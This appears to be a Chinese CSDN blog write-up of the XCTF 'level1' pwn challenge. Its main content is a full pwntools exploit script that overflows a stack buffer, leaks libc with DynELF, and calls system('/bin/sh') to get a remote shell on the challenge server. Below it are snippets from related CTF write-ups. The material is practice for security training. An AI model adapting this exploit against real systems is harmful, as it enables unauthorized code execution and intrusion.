xctf攻防世界_level1——本地和远程程序不一样

最新推荐文章于 2024-06-05 16:45:03 发布
最新推荐文章于 2024-06-05 16:45:03 发布
阅读量757 收藏
点赞数 1
分类专栏: PWN 文章标签: PWN 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lonyliu/article/details/90450163
版权 
#-*-coding:utf-8 -*-
import pwn
from pwn import *
#pwn.context.log_level = 'debug'

#context(arch = 'i386', os = 'linux')
#shellcode = asm(shellcraft.sh())#用函数shellcraft.sh()直接生成shellcode
#asm
#io = process('./level1')
io = remote('111.198.29.45', 52614)

elf=ELF('./level1')

write_plt=elf.symbols['write']
write_got=elf.got['write']
read_plt=elf.symbols['read']
bss=elf.bss()
start=0x08048380
main=0x080484B7 
def leak(address):
	payload='a'*(0x88+4)+p32(write_plt)+p32(start)+p32(1)+p32(address)+p32(4)
	#io.recvuntil("?\n") #本地和远程有区别,请注意这里!
	io.send(payload)
	leaked=io.recv(4)
	print "[%s] -> [%s] = [%s]" % (hex(address),hex(u32(leaked)),repr(leaked))
	return leaked
d=pwn.DynELF(leak,elf=ELF('./level1'))
system=d.lookup('system','libc')
print hex(system)
print
print hex(bss)
payload2='a'*(0x88+4)+p32(read_plt)+p32(0x08048549)+p32(0)+p32(bss)+p32(8)

payload2+=p32(system)+p32(0xdeadbeef)+p32(bss)
raw_input()
io.sendline(payload2)

io.send('/bin/sh\x00')

io.interactive()

本来是个简单的题(程序给出了buf地址),但是远程程序不一样,直接变成了无libc的PWN。

「已注销」
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1445
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
xctf攻防世界 CRYPTO高手进阶区 告诉你个秘密
m0_52484587的博客
08-17 139
几个字母为一组,且以空格进行分组。经过观察发现其在键盘上的位置刚好可以围住一些字母,按照这种规则走下去,可以得到一个意义的字符串,即最终的flag。可以发现,文档中的所有字符范围在0-F之间,也就是说符合16进制的数据,所以可以首先尝试将其按照ascii的十六进制解码得到另一串字符串。HEX编码/解码在线工具,用于HEX编码和HEX解码,支持查看常见的应用场景。HEX编码/解码 - 在线工具。最终答案为:TONGYUAN。
【愚公系列】2022年01月 攻防世界-简单题-PWN-001(level0)
热门推荐
时光隧道
01-17 3万+
文章目录一、level0二、答题步骤1.获取在线场景2.查壳3.IDA总结 一、level0 题目链接:https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=0 二、答题步骤 1.获取在线场景 2.查壳 对下载文件进行查壳,命令如下 file level0 checksec --file=level0 分析文件,小端程序(LSB),栈不可执行。 3.IDA 使用IDA对文件进行反汇编 第一步:首先找到ma
攻防世界XCTF-Pwn入门11题解题报告
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-05 647
如果你也想学习:黑客&网络安全的零基础攻防教程Pwn是CTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。
xctf攻防世界 REVERSE 高手进阶区 Mysterious
l8947943的博客
04-01 9658
0x01. 进入环境,下载附件 给出的是一个exe文件,双击运行,如图: 需要输入密码才能破译,如何想办法搞到密码才就是关键 0x02.问题分析 使用exeinfoPE打开看看是否有加壳,如图: 并没有壳子,32位可执行文件,那么果断丢入IDA中进行查看内容,找到main函数,F5反编译,主函数代码如下,注释已写: int __stdcall sub_401090(HWND hWnd, int a2, int a3, int a4) { char v5; // [esp+50h] [ebp-310h
xctf攻防世界 MISC高手进阶区 low
l8947943的博客
01-25 1万+
1. 进入环境,下载附件 给出的一张bmp图片,没有其他信息 2. 问题分析 扔进binwalk中,没有发现有用信息 使用zsteg,没有有用信息 塞入StegSolve中,发现有点猫腻,如图: 有点二维码的感觉,emmm,需要像素处理,但不知道如何下手,参考网上的wp,发现是让使用lsb隐写,copy代码: from PIL import Image img = Image.open('./pic/low.bmp') img_tmp = img.copy() pix = img_tmp.load()
XCTF攻防世界web.doc
09-19
在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力。本WriteUp将详细解释如何在...
XCTF_A_应收管理标准功能培训.pptx
10-11
XCTF_A_应收管理标准功能培训】的PPT内容涵盖了Oracle财务系统的应收管理模块,这个模块是企业销售到收款流程中的关键部分。以下是基于提供的文件内容详细解析的知识点: 1. **销售到收款流程概览**: - 销售到...
xctf.rar_HTML5自适应
09-19
自适应浏览器是指网页能够根据用户的设备和屏幕尺寸自动调整布局和内容。HTML5引入了`<meta name="viewport">`标签,用于控制移动设备的视口大小,从而实现响应式设计。此外,媒体查询(Media Queries)也是自适应...
XCTF_A_物料清单标准功能培训.pptx
10-11
XCTF_A_物料清单标准功能培训中,主要涵盖了Oracle系统的物料管理及相关流程,旨在提升用户对物料清单(BOM)的运用和理解。以下是详细的讲解内容: 1. **物料管理**: - **系统组织架构**:Oracle系统中的组织...
XCTF_A_应付管理标准功能培训.pptx
10-11
XCTF_A_应付管理标准功能培训.pptx
攻防世界 pwn1
10-25 967
1 题目 2 分析 流程很简单,提供三个功能,store print quit。store功能存在明显的溢出点: 接下来就是利用溢出点,将代码转跳到system方法执行即可。所以接下来的就要通过构造ROP将相对地址打印出来,然后溢出one_gadget.exp如下: from pwn import * from LibcSearcher import * io = remote("220.249.52.133","38178") context.log_level = 'debug.
XCTF 攻防世界 MISC杂项 高手进阶区
qq_44657899的博客
02-05 5317
文章目录MISCall神奇的Modbus(送分)embarrass(送分)Training-Stegano-1(送分)Test-flag-please-ignore(16进制转字符)stage1(图片隐写,反编译)Hear-with-your-Eyes(音频隐写-频谱图) MISCall 神奇的Modbus(送分) 日期:2020/02/04 题目说了Modbus,百度了一下是一个通讯协议。 先...
XCTF(攻防世界)—新手web题Write Up
Lemon's blog
07-10 2659
前言:之前一直没有接触过web这方面的题,这次利用暑假时光好好学习,web真的是很有趣,虽然有的题很简单,但可以学习到很多知识,话不多说,做题。
攻防世界_pwn_level2(萌新版)
TedLau的博客
02-24 2431
首发于鄙人博客:传送门 0x00 前言 32位,NX enabled 0x10 步骤 0x11 main函数 很明显我们需要去查看vulnerable函数。 0x12 vulnerable函数 在这里我们需要向题目中输入若干内容,又观察到buf的长度为0x88,那么我们便可以构造出0x88长度的无关数据,然后再输入4个长度的垃圾数据以覆盖ebp,然...
xctf pwn1
qq_41071646的博客
05-14 956
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
攻防世界XCTF)功夫再高也怕菜刀
CNXBDSa的博客
08-08 5529
攻防世界XCTF)功夫再高也怕菜刀 首先下载文件下来是一个以pcapng结尾的文件看属性有二点几m可见东西不小啊 先放进foremost中分离出来一个压缩包但是他有密码,所以接下来就是我们找密码的时候 把文件放进Wireshark中,妈呀看着我头皮发麻,东西太多了,按照常规方式去追踪一下TCP流,呃呃呃,看不懂非常乱,ctrl+f查找一下flag调成字符串类型, 去查找大概在1150个左右寻找t...
XCTF攻防世界web新手练习_ 3_cookie
silence1_的博客
04-28 1573
XCTF攻防世界web新手练习—cookie 题目 题目为cookie,描述信息: 题目肯定与cookie有关,进入题目,看到 用burp抓包,看到响应头设置了一个cookie,并提示cookie.php 于是查看cookie.php,提示看响应于是再次用burp抓包,在响应头中得到flag! 关于cookie 维基百科 Cookie(复数形态Cookies),又称为“小甜饼”。类型为“小...
攻防世界)(pwn)welpwn
PLpa的博客
07-18 2694
首先,放在最前面:这题服务器远端的libc版本是libc-2.23.so而不是libc-2.19.so的版本(害得我编译半天出不来) 看到题目,我们下载附件,一看是个tar.gz文件,我们解压一下,发现里面有三个文件: 我就心想,这个攻防世界怎么就这么好心这次,以前要给的时候从来不给,这次这么大方???答案是大错特错,这就是个骗局,这个反而是个障碍,版本根本就是错的(但仔细一想,有可能是出题者故...
攻防世界upload1
07-28
- *2* *3* [XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)](https://blog.csdn.net/Onlyone_1314/article/details/121503130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值